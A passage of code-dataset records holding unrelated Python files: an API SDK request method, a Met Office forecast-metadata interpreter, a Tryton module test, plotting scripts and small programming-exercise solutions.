endpoint\n print(\"\\n{}\\n {}\\n\".format(endpoint.replace(\"https://api.transpose.io\", self.host).split(\"?\")[0], \"\\n \".join(endpoint.split(\"?\")[1].split(\"&\")))) if self.verbose else None\n request = requests.get(endpoint.replace(\"https://api.transpose.io\", self.host), headers=request_headers)\n \n # check for a successful response\n if request.status_code == 200:\n \n response = request.json()\n \n # If the response contains a paginator, set the paginator's next endpoint\n if 'next' in response:\n if response['next'] is None:\n self._next = None\n self._next_class_name = None\n else: \n self._next = response['next']\n self._next_class_name = model\n \n # if we are in json mode, return the raw json\n if self.json:\n return response\n\n return list(model(dict(each)) for each in response['results'])\n else:\n raise_custom_error(request.status_code, request.json()['message'])","repo_name":"TransposeData/transpose-python-sdk","sub_path":"transpose/src/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6189,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"90"} +{"seq_id":"18012371639","text":"N, A, B = map(int, input().split())\nitems = list(map(int, input().split()))\n\nitems.sort(reverse=True)\n\nmaxAvg = sum(items[:A]) / A\n\nprint(maxAvg)\n\nfact = [1 for _ in range(N + 10)]\n\nfor i in range(1, N + 10):\n fact[i] = (fact[i - 1] * i)\n\ndef comb(n, r):\n if 0 < r < n:\n return fact[n] // fact[r] // fact[n - r]\n if r == 0 or r == n:\n return 1\n return 0\n\n\nif items[0] == items[A - 1]:\n right = A - 1\n while right < N and items[right] == items[0]:\n right += 1\n ans = 0\n for take in range(A, B + 1):\n ans += comb(right, take)\n print(ans)\nelse:\n left = A - 1\n while left >= 0 and items[left] == items[A - 1]:\n left -= 1\n right = A - 1\n while right < N and items[right] == items[A - 1]:\n right += 1\n ans = comb(right - left - 1, A - left - 1)\n print(ans)","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03776/s873575606.py","file_name":"s873575606.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14064320511","text":"import re\nfrom typing import Callable, Dict, Iterable, List\n\nfrom iris.coords import CellMethod, Coord\nfrom iris.cube import Cube\nfrom iris.exceptions import CoordinateNotFoundError\n\nfrom improver.metadata.check_datatypes import check_mandatory_standards\nfrom improver.metadata.constants import PERC_COORD\nfrom improver.metadata.constants.attributes import MANDATORY_ATTRIBUTES\nfrom improver.metadata.probabilistic import (\n find_percentile_coordinate,\n find_threshold_coordinate,\n get_threshold_coord_name_from_probability_name,\n)\nfrom improver.utilities.cube_manipulation import get_coord_names\n\n# Constants relating to metadata encoding\n\n# Model name-to-attribute maps\nMODEL_CODES = {\n \"Nowcast\": \"nc_det\",\n \"Global\": \"gl_det\",\n \"MOGREPS-G\": \"gl_ens\",\n \"MOGREPS-UK\": \"uk_ens\",\n \"UKV\": \"uk_det\",\n}\nMODEL_NAMES = dict((v, k) for k, v in MODEL_CODES.items())\n\n# Diagnostics that differ from the PROB / PERC / DIAG pattern (not all are handled)\nANCILLARIES = [\n \"surface_altitude\",\n \"land_fraction\",\n \"land_binary_mask\",\n \"grid_with_halo\",\n \"topographic_zone_weights\",\n \"topography_mask\",\n \"silhouette_roughness\",\n \"standard_deviation_of_height_in_grid_cell\",\n \"smoothing_coefficient_x\",\n \"smoothing_coefficient_y\",\n \"linke_turbidity\",\n]\nEMOS_COEFF_NAMES = [\n f\"emos_coefficient_{coeff}\" for coeff in [\"alpha\", \"beta\", \"gamma\", \"delta\"]\n]\nINTERMEDIATES = [\n \"grid_neighbours\",\n \"grid_eastward_wind\",\n \"grid_northward_wind\",\n \"precipitation_advection_x_velocity\",\n \"precipitation_advection_y_velocity\",\n \"reliability_calibration_table\",\n] + EMOS_COEFF_NAMES\n\nSPECIAL_CASES = [\"weather_code\", \"wind_from_direction\"] + INTERMEDIATES + ANCILLARIES\n\n# Expected coordinates for different field types\nSPOT_COORDS = [\"spot_index\", \"latitude\", \"longitude\", \"altitude\", \"wmo_id\"]\nUNBLENDED_TIME_COORDS = [\"time\", \"forecast_period\", \"forecast_reference_time\"]\nBLENDED_TIME_COORDS = [\"time\", \"blend_time\"]\n\n# Compliant, required and forbidden cell methods\nNONCOMP_CMS = [\n CellMethod(method=\"mean\", coords=\"forecast_reference_time\"),\n CellMethod(method=\"mean\", coords=\"model_id\"),\n CellMethod(method=\"mean\", coords=\"model_configuration\"),\n CellMethod(method=\"mean\", coords=\"realization\"),\n]\nNONCOMP_CM_METHODS = [\"point\", \"weighted_mean\"]\nCOMPLIANT_CM_METHODS = [\"min\", \"max\", \"minimum\", \"maximum\", \"sum\"]\nPRECIP_ACCUM_CM = CellMethod(method=\"sum\", coords=\"time\")\nPRECIP_ACCUM_NAMES = [\n \"lwe_thickness_of_precipitation_amount\",\n \"lwe_thickness_of_sleetfall_amount\",\n \"lwe_thickness_of_snowfall_amount\",\n \"thickness_of_rainfall_amount\",\n]\nWXCODE_MODE_CM = lambda hour: CellMethod(\n method=\"mode\", coords=\"time\", intervals=f\"{hour} hour\"\n)\nWXCODE_NAMES = [\"weather_code\"]\n\n# Compliant, required and forbidden attributes\nNONCOMP_ATTRS = [\n \"mosg__grid_type\",\n \"mosg__grid_domain\",\n \"mosg__grid_version\",\n \"mosg__forecast_run_duration\",\n \"grid_id\",\n \"source_realizations\",\n \"um_version\",\n]\nDIAG_ATTRS = {\n \"weather_code\": [\"weather_code\", \"weather_code_meaning\"],\n \"wind_gust\": [\"wind_gust_diagnostic\"],\n}\nCOMPLIANT_ATTRS = MANDATORY_ATTRIBUTES + [\n \"Conventions\",\n \"least_significant_digit\",\n \"mosg__model_configuration\",\n \"mosg__model_run\",\n]\n\n# Expected substrings to be found in certain title attributes\nBLEND_TITLE_SUBSTR = \"IMPROVER Post-Processed Multi-Model Blend\"\nPP_TITLE_SUBSTR = \"Post-Processed\"\nSPOT_TITLE_SUBSTR = \"Spot Values\"\n\n\nclass MOMetadataInterpreter:\n \"\"\"Class to interpret an iris cube according to the Met Office specific\n IMPROVER standard. This is intended as a debugging tool to aid developers\n in adding and modifying metadata within the code base.\"\"\"\n\n PROB = \"probabilities\"\n PERC = \"percentiles\"\n DIAG = \"realizations\"\n ANCIL = \"ancillary\"\n\n def __init__(self) -> None:\n \"\"\"Initialise class parameters, which store information about a cube to be\n parsed into a human-readable string by the\n :func:`~improver.developer_tools.metadata_interpreter.display_interpretation`\n function.\n \"\"\"\n self.model_id_attr = \"mosg__model_configuration\"\n self.record_run_attr = \"mosg__model_run\"\n self.unhandled = False\n\n # set up empty strings to record any non-compliance (returned as one error\n # after all checks have been made) or warnings\n self.errors = []\n self.warnings = []\n # initialise information to be derived from input cube\n self.prod_type = \"gridded\" # gridded or spot\n self.field_type = (\n None # probabilities, percentiles, realizations, ancillary or name\n )\n self.diagnostic = None # name\n self.relative_to_threshold = None # for probability data only\n self.methods = \"\" # human-readable interpretation of cell method(s)\n self.post_processed = (\n None # True / False on whether significant processing applied\n )\n self.model = None # human-readable model name\n self.blended = None # has it been model blended (True / False)\n\n def check_probability_cube_metadata(self, cube: Cube) -> None:\n \"\"\"Checks probability-specific metadata\"\"\"\n if cube.units != \"1\":\n self.errors.append(\n f\"Expected units of 1 on probability data, got {cube.units}\"\n )\n\n try:\n self.diagnostic = get_threshold_coord_name_from_probability_name(\n cube.name()\n )\n except ValueError as cause:\n # if the probability name is not valid\n self.errors.append(str(cause))\n return\n\n expected_threshold_name = self.diagnostic\n\n if not cube.coords(expected_threshold_name):\n msg = f\"Cube does not have expected threshold coord '{expected_threshold_name}'; \"\n try:\n threshold_name = find_threshold_coordinate(cube).name()\n except CoordinateNotFoundError:\n coords = [coord.name() for coord in cube.coords()]\n msg += (\n f\"no coord with var_name='threshold' found in all coords: {coords}\"\n )\n self.errors.append(msg)\n else:\n msg += f\"threshold coord has incorrect name '{threshold_name}'\"\n self.errors.append(msg)\n self.check_threshold_coordinate_properties(\n cube.name(), cube.coord(threshold_name)\n )\n else:\n threshold_coord = cube.coord(expected_threshold_name)\n self.check_threshold_coordinate_properties(cube.name(), threshold_coord)\n\n def check_threshold_coordinate_properties(\n self, cube_name: str, threshold_coord: Coord\n ) -> None:\n \"\"\"Checks threshold coordinate properties are correct and consistent with\n cube name\"\"\"\n if threshold_coord.var_name != \"threshold\":\n self.errors.append(\n f\"Threshold coord {threshold_coord.name()} does not have \"\n \"var_name='threshold'\"\n )\n\n try:\n self.relative_to_threshold = threshold_coord.attributes[\n \"spp__relative_to_threshold\"\n ]\n except KeyError:\n self.errors.append(\n f\"{cube_name} threshold coordinate has no \"\n \"spp__relative_to_threshold attribute\"\n )\n return\n\n if self.relative_to_threshold in (\"greater_than\", \"greater_than_or_equal_to\"):\n threshold_attribute = \"above\"\n elif self.relative_to_threshold in (\"less_than\", \"less_than_or_equal_to\"):\n threshold_attribute = \"below\"\n elif self.relative_to_threshold == \"between_thresholds\":\n # TODO remove this once we get rid of the \"between thresholds\" plugin and CLI\n threshold_attribute = \"between\"\n self.warnings.append(\"Between thresholds data are not fully supported\")\n else:\n threshold_attribute = None\n self.errors.append(\n f\"spp__relative_to_threshold attribute '{self.relative_to_threshold}' \"\n \"is not in permitted value set\"\n )\n\n if threshold_attribute and threshold_attribute not in cube_name:\n self.errors.append(\n f\"Cube name '{cube_name}' is not consistent with \"\n f\"spp__relative_to_threshold attribute '{self.relative_to_threshold}'\"\n )\n\n def check_cell_methods(self, cube: Cube) -> None:\n \"\"\"Checks cell methods are permitted and correct\"\"\"\n if any([substr in cube.name() for substr in PRECIP_ACCUM_NAMES]):\n msg = f\"Expected sum over time cell method for {cube.name()}\"\n if not cube.cell_methods:\n self.errors.append(msg)\n else:\n found_cm = False\n for cm in cube.cell_methods:\n if (\n cm.method == PRECIP_ACCUM_CM.method\n and cm.coord_names == PRECIP_ACCUM_CM.coord_names\n ):\n found_cm = True\n if not found_cm:\n self.errors.append(msg)\n\n for cm in cube.cell_methods:\n if cm.method in COMPLIANT_CM_METHODS:\n self.methods += f\" {cm.method} over {cm.coord_names[0]}\"\n if self.field_type == self.PROB:\n cm_options = [\n f\"of {self.diagnostic}\",\n f\"of {self.diagnostic} over .* within time window\",\n ]\n if not cm.comments or not any(\n [re.match(cmo, cm.comments[0]) for cmo in cm_options]\n ):\n self.errors.append(\n f\"Cell method {cm} on probability data should have comment \"\n f\"'of {self.diagnostic}'\"\n )\n # check point and bounds on method coordinate\n if \"time\" in cm.coord_names:\n if cube.coord(\"time\").bounds is None:\n self.errors.append(f\"Cube of{self.methods} has no time bounds\")\n\n elif cm in NONCOMP_CMS or cm.method in NONCOMP_CM_METHODS:\n self.errors.append(f\"Non-standard cell method {cm}\")\n else:\n # flag method which might be invalid, but we can't be sure\n self.warnings.append(\n f\"Unexpected cell method {cm}. Please check the standard to \"\n \"ensure this is valid\"\n )\n\n def _check_blend_and_model_attributes(self, attrs: Dict) -> None:\n \"\"\"Interprets attributes for model and blending information\n and checks for self-consistency\"\"\"\n self.blended = True if BLEND_TITLE_SUBSTR in attrs[\"title\"] else False\n\n if self.blended:\n complete_blend_attributes = True\n if self.model_id_attr not in attrs:\n self.errors.append(f\"No {self.model_id_attr} on blended file\")\n complete_blend_attributes = False\n if self.record_run_attr not in attrs:\n self.errors.append(f\"No {self.record_run_attr} on blended file\")\n complete_blend_attributes = False\n\n if complete_blend_attributes:\n codes = attrs[self.model_id_attr].split(\" \")\n names = []\n cycles = {\n k: v\n for k, v in [\n item.split(\":\")[0:-1]\n for item in attrs[self.record_run_attr].split(\"\\n\")\n ]\n }\n\n for code in codes:\n try:\n names.append(MODEL_NAMES[code])\n except KeyError:\n self.errors.append(\n f\"Model ID attribute contains unrecognised model code {code}\"\n )\n else:\n names[-1] += f\" (cycle: {cycles[code]})\"\n self.model = \", \".join(names)\n\n return\n\n if self.model_id_attr in attrs:\n for key in MODEL_CODES:\n if (\n f\"{key} Model\" in attrs[\"title\"]\n and attrs[self.model_id_attr] != MODEL_CODES[key]\n ):\n self.errors.append(\n f\"Title {attrs['title']} is inconsistent with model ID \"\n f\"attribute {attrs[self.model_id_attr]}\"\n )\n\n try:\n self.model = MODEL_NAMES[attrs[self.model_id_attr]]\n except KeyError:\n self.errors.append(\n f\"Attribute {attrs[self.model_id_attr]} is not a valid single \"\n \"model. If valid for blend, then title attribute is missing \"\n f\"expected substring {BLEND_TITLE_SUBSTR}.\"\n )\n\n def check_attributes(self, attrs: Dict) -> None:\n \"\"\"Checks for unexpected attributes, then interprets values for model\n information and checks for self-consistency\"\"\"\n if self.diagnostic in DIAG_ATTRS:\n permitted_attributes = COMPLIANT_ATTRS + DIAG_ATTRS[self.diagnostic]\n else:\n permitted_attributes = COMPLIANT_ATTRS.copy()\n\n if any([attr in NONCOMP_ATTRS for attr in attrs]):\n self.errors.append(\n f\"Attributes {attrs.keys()} include one or more forbidden \"\n f\"values {[attr for attr in attrs if attr in NONCOMP_ATTRS]}\"\n )\n elif any([attr not in permitted_attributes for attr in attrs]):\n self.warnings.append(\n f\"{attrs.keys()} include unexpected attributes \"\n f\"{[attr for attr in attrs if attr not in permitted_attributes]}. \"\n \"Please check the standard to ensure this is valid.\"\n )\n\n if self.diagnostic in DIAG_ATTRS:\n required = DIAG_ATTRS[self.diagnostic]\n if any([req not in attrs for req in required]):\n self.errors.append(\n f\"Attributes {attrs.keys()} missing one or more required \"\n f\"values {[req for req in required if req not in attrs]}\"\n )\n\n if self.field_type != self.ANCIL:\n if not all([attr in attrs for attr in MANDATORY_ATTRIBUTES]):\n self.errors.append(\n f\"Attributes {attrs.keys()} missing one or more mandatory values \"\n f\"{[req for req in MANDATORY_ATTRIBUTES if req not in attrs]}\"\n )\n\n if \"title\" in attrs:\n self.post_processed = (\n True\n if PP_TITLE_SUBSTR in attrs[\"title\"]\n or BLEND_TITLE_SUBSTR in attrs[\"title\"]\n else False\n )\n # determination of whether file is blended depends on title\n self._check_blend_and_model_attributes(attrs)\n\n def _check_coords_present(\n self, coords: List[str], expected_coords: Iterable[str]\n ) -> None:\n \"\"\"Check whether all expected coordinates are present\"\"\"\n found_coords = [coord for coord in coords if coord in expected_coords]\n if not set(found_coords) == set(expected_coords):\n self.errors.append(\n f\"Missing one or more coordinates: found {found_coords}, \"\n f\"expected {expected_coords}\"\n )\n\n def _check_coords_are_horizontal(self, cube: Cube, coords: List[str]) -> None:\n \"\"\"Checks that all the mentioned coords share the same dimensions as the x and y coords\"\"\"\n y_coord, x_coord = (cube.coord(axis=n) for n in \"yx\")\n horizontal_dims = set([cube.coord_dims(n)[0] for n in [y_coord, x_coord]])\n for coord in coords:\n try:\n coord_dims = set(cube.coord_dims(coord))\n except CoordinateNotFoundError:\n # The presence of coords is checked elsewhere\n continue\n if coord_dims != horizontal_dims:\n self.errors.append(\n f\"Coordinate {coord} does not span all horizontal coordinates\"\n )\n\n def _check_coord_bounds(self, cube: Cube, coord: str) -> None:\n \"\"\"If coordinate has bounds, check points are equal to upper bound\"\"\"\n if cube.coord(coord).bounds is not None:\n upper_bounds = cube.coord(coord).bounds[..., 1]\n if not (cube.coord(coord).points == upper_bounds).all():\n self.errors.append(f\"{coord} points should be equal to upper bounds\")\n\n def check_spot_data(self, cube: Cube, coords: List[str]) -> None:\n \"\"\"Check spot coordinates\"\"\"\n self.prod_type = \"spot\"\n if \"title\" in cube.attributes:\n if SPOT_TITLE_SUBSTR not in cube.attributes[\"title\"]:\n self.errors.append(\n f\"Title attribute {cube.attributes['title']} is not \"\n \"consistent with spot data\"\n )\n\n self._check_coords_present(coords, SPOT_COORDS)\n self._check_coords_are_horizontal(cube, SPOT_COORDS)\n\n def run(self, cube: Cube) -> None:\n \"\"\"Populates self-consistent interpreted parameters, or raises collated errors\n describing (as far as posible) how the metadata are a) not self-consistent,\n and / or b) not consistent with the Met Office IMPROVER standard.\n\n Although every effort has been made to return as much information as possible,\n collated errors may not be complete if the issue is fundamental. The developer\n is advised to rerun this tool after each fix, until no further problems are\n raised.\n \"\"\"\n\n # 1) Interpret diagnostic and type-specific metadata, including cell methods\n if cube.name() in ANCILLARIES:\n self.field_type = self.ANCIL\n self.diagnostic = cube.name()\n if cube.cell_methods:\n self.errors.append(f\"Unexpected cell methods {cube.cell_methods}\")\n\n elif cube.name() in SPECIAL_CASES:\n self.field_type = self.diagnostic = cube.name()\n if cube.name() in WXCODE_NAMES:\n for cm in cube.cell_methods:\n valid_wx_cm = False\n for hour in [1, 3]:\n wx_cell_method = WXCODE_MODE_CM(hour)\n if cm == wx_cell_method:\n diagnostic = self.diagnostic.replace(\"_\", \" \")\n self.methods += (\n f\"{cm.method} of {cm.intervals[0]} \"\n f\"{diagnostic} over {cm.coord_names[0]}\"\n )\n valid_wx_cm = True\n break\n if not valid_wx_cm:\n self.errors.append(\n f\"Unexpected cell methods {cube.cell_methods}\"\n )\n elif cube.name() == \"wind_from_direction\":\n if cube.cell_methods:\n expected = CellMethod(method=\"mean\", coords=\"realization\")\n if len(cube.cell_methods) > 1 or cube.cell_methods[0] != expected:\n self.errors.append(\n f\"Unexpected cell methods {cube.cell_methods}\"\n )\n else:\n self.unhandled = True\n return\n\n else:\n if \"probability\" in cube.name() and \"threshold\" in cube.name():\n self.field_type = self.PROB\n self.check_probability_cube_metadata(cube)\n else:\n self.diagnostic = cube.name()\n try:\n perc_coord = find_percentile_coordinate(cube)\n except CoordinateNotFoundError:\n coords = get_coord_names(cube)\n if any(\n [cube.coord(coord).var_name == \"threshold\" for coord in coords]\n ):\n self.field_type = self.PROB\n self.check_probability_cube_metadata(cube)\n else:\n self.field_type = self.DIAG\n else:\n self.field_type = self.PERC\n if perc_coord.name() != PERC_COORD:\n self.errors.append(\n f\"Percentile coordinate should have name {PERC_COORD}, \"\n f\"has {perc_coord.name()}\"\n )\n\n if perc_coord.units != \"%\":\n self.errors.append(\n \"Percentile coordinate should have units of %, \"\n f\"has {perc_coord.units}\"\n )\n\n self.check_cell_methods(cube)\n\n # 2) Interpret model and blend information from cube attributes\n self.check_attributes(cube.attributes)\n\n # 3) Check whether expected coordinates are present\n coords = get_coord_names(cube)\n if \"spot_index\" in coords:\n self.check_spot_data(cube, coords)\n\n if self.field_type == self.ANCIL:\n # there is no definitive standard for time coordinates on static ancillaries\n pass\n elif self.blended:\n self._check_coords_present(coords, BLENDED_TIME_COORDS)\n else:\n self._check_coords_present(coords, UNBLENDED_TIME_COORDS)\n\n # 4) Check points are equal to upper bounds for bounded time coordinates\n for coord in [\"time\", \"forecast_period\"]:\n if coord in get_coord_names(cube):\n self._check_coord_bounds(cube, coord)\n\n # 5) Check datatypes on data and coordinates\n try:\n check_mandatory_standards(cube)\n except ValueError as cause:\n self.errors.append(str(cause))\n\n # 6) Check multiple realizations only exist for ensemble models\n if self.field_type == self.DIAG:\n try:\n realization_coord = cube.coord(\"realization\")\n except CoordinateNotFoundError:\n pass\n else:\n model_id = cube.attributes.get(self.model_id_attr, \"ens\")\n if \"ens\" not in model_id and len(realization_coord.points) > 1:\n self.errors.append(\n f\"Deterministic model should not have {len(realization_coord.points)} \"\n \"realizations\"\n )\n\n # 7) Raise collated errors if present\n if self.errors:\n raise ValueError(\"\\n\".join(self.errors))\n\n\ndef _format_standard_cases(\n interpreter: MOMetadataInterpreter, verbose: bool, vstring: Callable[[str], str]\n) -> List[str]:\n \"\"\"Format prob / perc / diagnostic information from a\n MOMetadataInterpreter instance\"\"\"\n field_type = interpreter.field_type.replace(\"_\", \" \")\n diagnostic = interpreter.diagnostic.replace(\"_\", \" \")\n if interpreter.relative_to_threshold:\n relative_to_threshold = interpreter.relative_to_threshold.replace(\"_\", \" \")\n\n rval = []\n rtt = (\n f\" {relative_to_threshold} thresholds\"\n if interpreter.field_type == interpreter.PROB\n else \"\"\n )\n rval.append(f\"It contains {field_type} of {diagnostic}{rtt}\")\n if verbose:\n rval.append(vstring(\"name, threshold coordinate (probabilities only)\"))\n\n if interpreter.methods:\n rval.append(f\"These {field_type} are of {diagnostic}{interpreter.methods}\")\n if verbose:\n rval.append(vstring(\"cell methods\"))\n\n ppstring = \"some\" if interpreter.post_processed else \"no\"\n rval.append(f\"It has undergone {ppstring} significant post-processing\")\n if verbose:\n rval.append(vstring(\"title attribute\"))\n return rval\n\n\ndef display_interpretation(\n interpreter: MOMetadataInterpreter, verbose: bool = False\n) -> str:\n \"\"\"Prints metadata interpretation in human-readable form. This should\n not be run on a MOMetadataInterpreter instance that has raised errors.\n\n Args:\n interpreter:\n Populated instance of MOMetadataInterpreter\n verbose:\n Optional flag to include information about the source of the\n metadata interpretation (eg name, coordinates, attributes, etc)\n\n Returns:\n Formatted string describing metadata in human-readable form\n \"\"\"\n if interpreter.unhandled:\n return f\"{interpreter.diagnostic} is not handled by this interpreter\\n\"\n\n def vstring(source_metadata):\n \"\"\"Format additional message for verbose output\"\"\"\n return f\" Source: {source_metadata}\"\n\n field_type = interpreter.field_type.replace(\"_\", \" \")\n output = []\n if field_type == \"realizations\":\n field_type_clause = f\"file containing one or more {field_type}\"\n else:\n field_type_clause = f\"{field_type} file\"\n output.append(f\"This is a {interpreter.prod_type} {field_type_clause}\")\n if verbose:\n output.append(vstring(\"name, coordinates\"))\n\n if interpreter.diagnostic not in SPECIAL_CASES:\n output.extend(_format_standard_cases(interpreter, verbose, vstring))\n\n if interpreter.diagnostic in WXCODE_NAMES and interpreter.methods:\n output.append(f\"These {field_type} are {interpreter.methods}\")\n if verbose:\n output.append(vstring(\"cell methods\"))\n\n if interpreter.diagnostic in ANCILLARIES:\n output.append(\"This is a static ancillary with no time information\")\n elif interpreter.blended:\n output.append(f\"It contains blended data from models: {interpreter.model}\")\n if verbose:\n output.append(\n vstring(\"title attribute, model ID attribute, model run attribute\")\n )\n else:\n if interpreter.model:\n output.append(f\"It contains data from {interpreter.model}\")\n if verbose:\n output.append(vstring(\"model ID attribute\"))\n else:\n output.append(\"It has no source model information and cannot be blended\")\n if verbose:\n output.append(vstring(\"model ID attribute (missing)\"))\n\n if interpreter.warnings:\n warning_string = \"\\n\".join(interpreter.warnings)\n output.append(f\"WARNINGS:\\n{warning_string}\")\n\n return \"\\n\".join(output) + \"\\n\"\n","repo_name":"metoppv/improver","sub_path":"improver/developer_tools/metadata_interpreter.py","file_name":"metadata_interpreter.py","file_ext":"py","file_size_in_byte":26552,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"90"} +{"seq_id":"42887933977","text":"\nfrom trytond.tests.test_tryton import ModuleTestCase, with_transaction\nfrom trytond.transaction import Transaction\nfrom trytond.pool import Pool\n\n\nclass ProductCodeUniqueTestCase(ModuleTestCase):\n 'Test ProductCodeUnique module'\n module = 'product_code_unique'\n\n @with_transaction()\n def test0010check_uniqueness(self):\n 'Test check uniqueness'\n pool = Pool()\n Template = pool.get('product.template')\n Uom = pool.get('product.uom')\n transaction = Transaction()\n\n kilogram, = Uom.search([\n ('name', '=', 'Kilogram'),\n ], limit=1)\n Template.create([{\n 'name': 'P1',\n 'type': 'goods',\n 'default_uom': kilogram.id,\n 'products': [('create', [{\n 'code': '1',\n }])],\n }])\n\n # Don't fail if no code\n Template.create([{\n 'name': 'P2',\n 'type': 'goods',\n 'default_uom': kilogram.id,\n 'products': [('create', [{}])],\n }])\n\n # Fail if repeated code\n self.assertRaises(Exception, Template.create([{\n 'name': 'P3',\n 'type': 'goods',\n 'default_uom': kilogram.id,\n 'products': [('create', [{\n 'code': '1',\n }])],\n }]))\n transaction.rollback()\n\n\ndel ModuleTestCase\n","repo_name":"NaN-tic/trytond-product_code_unique","sub_path":"tests/test_module.py","file_name":"test_module.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17710897804","text":"from tkinter import *\r\nfrom tkinter import ttk,messagebox\r\nimport sqlite3\r\nfrom tkinter import messagebox\r\nclass Faculty:\r\n def __init__(self,root):\r\n self.root = root\r\n self.root.title(\"Attendance Management System\")\r\n self.root.geometry(\"1700x800+0+0\")\r\n self.root.configure(background=\"#96989b\")\r\n\r\n title=Label(self.root,text=\"Mark Attendance\",bd=10,relief=GROOVE,font=(\"times new roman\",40,\"bold\"),bg=\"yellow\",fg=\"red\")\r\n title.pack(side=TOP,fill=X)\r\n\r\n\r\n\r\nif __name__==\"__main__\":\r\n root = Tk()\r\n ob = Faculty(root)\r\n root.mainloop()","repo_name":"harshitjain123456/Attendance-Managment-system-","sub_path":"Mark_attendance.py","file_name":"Mark_attendance.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"28894936025","text":"import matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib.font_manager\nimport numpy as np\nimport sys\n\nfrom math import log10, floor\nfrom matplotlib import rcParams\nfrom matplotlib.ticker import FormatStrFormatter\n\nimport os.path\n\nplt.style.use('miller')\n\ndef exp(number) -> int:\n return abs(floor(log10(abs(number))))\n \ndef plot(name, threads):\n colors = [\"#0040a8\", \"#00a835\", \"#d7db0d\", \"#960500\", \"#960050\", \"#09b6ba\"]\n \n ith = 0\n outpath = \"/mnt/c/Users/words/eclipse/Thesis/\"\n outname = \"Vulcan_Figure-5.pdf\"\n \n plt.xlabel(\"Number of bodies\")\n plt.ylabel(\"Computation Time in Milliseconds\")\n\n log = plt.gca()\n log.set_xscale('log')\n log.set_yscale('log')\n log.tick_params(axis='both', which='major', direction='in')\n log.tick_params(axis='x', which='minor', bottom=False)\n log.xaxis.set_major_formatter(ticker.FuncFormatter(lambda y, _ : f'{exp(y)}'))\n\n if name != \"All\":\n plt.title(name+\" Threading\", fontsize = 24)\n\n for ii in range(1,threads+1):\n x,y = read(\"../../data/BS-threadTesting.2.txt\", name.lower(), ii)\n lin.plot(x,y, label = str(ii), c = colors[ii%len(colors)])\n log.plot(x, y, c = colors[ii%len(colors)])\n legend = plt.figlegend(prop={'size': 20}, title = \"Threads\", fontsize = 20, fancybox = True, loc = \"upper left\", bbox_to_anchor=(0.075,0.95))\n plt.setp(legend.get_title(),fontsize = 20)\n plt.savefig(outpath+outname, bbox_inches=\"tight\")\n else:\n plt.title(\"Measured improvement of parallelization\")\n for handle, label in zip([\"omp\", 'explicit', 'single'], ['Intra-step', 'Inter-step', 'Serial']):\n x,y = read(\"../../data/BS-threadTesting.2.txt\", handle, threads)\n log.plot(np.array(x) * 1e2, y, label=label, linewidth=2)\n \n plt.legend(prop={'size': 20}, title = \"Method\", fontsize=20, fancybox=True)\n plt.savefig(outpath+outname, bbox_inches=\"tight\")\n plt.show()\n \n \ndef read(filename, mode, threads):\n with open(filename) as fp:\n lines = fp.readlines();\n\n x = list()\n y = list()\n for ii in range(len(lines)):\n temp = lines[ii].split()\n if len(temp) > 3:\n if temp[0] == mode and int(temp[3]) == threads:\n x.append(int(temp[1]))\n y.append(int(temp[2]))\n return x,y\n\nplot(\"All\", 6)\n","repo_name":"WMiller256/Vulcan","sub_path":"src/plotting/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"90"} +{"seq_id":"40581743326","text":"# Reverse Vowels in a String\n# https://leetcode.com/problems/reverse-vowels-of-a-string/description/\nclass Solution:\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n vowels =\"aeiouAEIOU\"\n str = list(s)\n index1 = index2 = 0;\n i = 0;\n index2 = len(str)-1;\n j = index2;\n k=0;\n char = char2 = ''\n \n while (1):\n #print (str);\n #print (\"index1\",index1,\"index2\",index2)\n if (index1 >= index2):\n break;\n \n for i in range(index1, j+1):\n # print (\"looping i\",i,\"index1\",index1,\"i\",i,\"j\",j)\n char = str[i]\n if char in vowels:\n # print (\"in vowel ->\",char)\n index1 = i+1\n break;\n \n if (i >= index2):\n break;\n \n for j in range(index2, i-1, -1):\n # print (\"looping j\",j,\"index2\",index2,\"i\",i,\"j\",j)\n char2 = str[j]\n if char2 in vowels:\n # print (\"in vowel --->\",char2)\n index2 = j-1\n break;\n \n \n #print (\"chars \",char,char2)\n if (char in vowels and char2 in vowels):\n # print (char,char2,\"---swap\",index1,index2)\n str[index2+1] = char\n str[index1-1] = char2\n continue;\n \n return ''.join(str)\n \n","repo_name":"venkatsvpr/Problems_Solved","sub_path":"LC_Reverse_Vowels_in_String.py","file_name":"LC_Reverse_Vowels_in_String.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"90"} +{"seq_id":"39552494608","text":"T = int(input())\n\nbase64_table = {\n 'A' : 0,\n 'a' : 26,\n '0' : 52,\n '+' : 62,\n '/' : 63\n}\n\ndef to_binary(encoded_str):\n\n cal_str = ''\n\n if encoded_str.isupper():\n cal_str = 'A'\n elif encoded_str.islower():\n cal_str = 'a'\n elif encoded_str.isdecimal():\n cal_str = '0'\n\n binary_str = bin(base64_table[cal_str] + (ord(encoded_str) - ord(cal_str)))[2:]\n return '0'*(6-len(binary_str)) + binary_str\n\n\nfor tc in range(1, T+1):\n encoded_str = input()\n split_list = [list(encoded_str[index:index+4]) for index in range(0, len(encoded_str), 4)]\n binary_str = ''.join([to_binary(alpha) for item in split_list for alpha in item])\n binary_list = [chr(int(binary_str[index:index+8], 2)) for index in range(0, len(binary_str), 8)]\n \n decoded_str = ''.join(binary_list)\n print('#{} {}'.format(tc, decoded_str))","repo_name":"younygo1004/Algorithm_Solving","sub_path":"python/SWEA/D2/1928. Base64 Decoder/base64.py","file_name":"base64.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} 